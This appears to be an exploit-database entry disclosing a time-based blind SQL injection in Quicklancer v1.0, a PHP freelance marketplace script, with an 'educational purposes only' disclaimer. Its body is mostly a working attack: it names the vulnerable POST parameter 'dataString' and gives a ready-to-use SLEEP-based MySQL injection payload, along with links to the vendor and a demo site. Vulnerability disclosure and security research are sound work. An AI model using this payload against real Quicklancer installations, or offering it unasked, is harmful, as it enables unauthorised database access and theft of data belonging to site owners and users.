Exploits / Vulnerability Discovered : 2023-05-23 |
Type : webapps |
Platform : php
This exploit / vulnerability Quicklancer v1.0 sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Quicklancer v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor:
https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135
# Demo Site: https://quicklancer.bylancer.com
# Tested on: Kali Linux
# CVE: N/A
Parameter: dataString (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068
FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo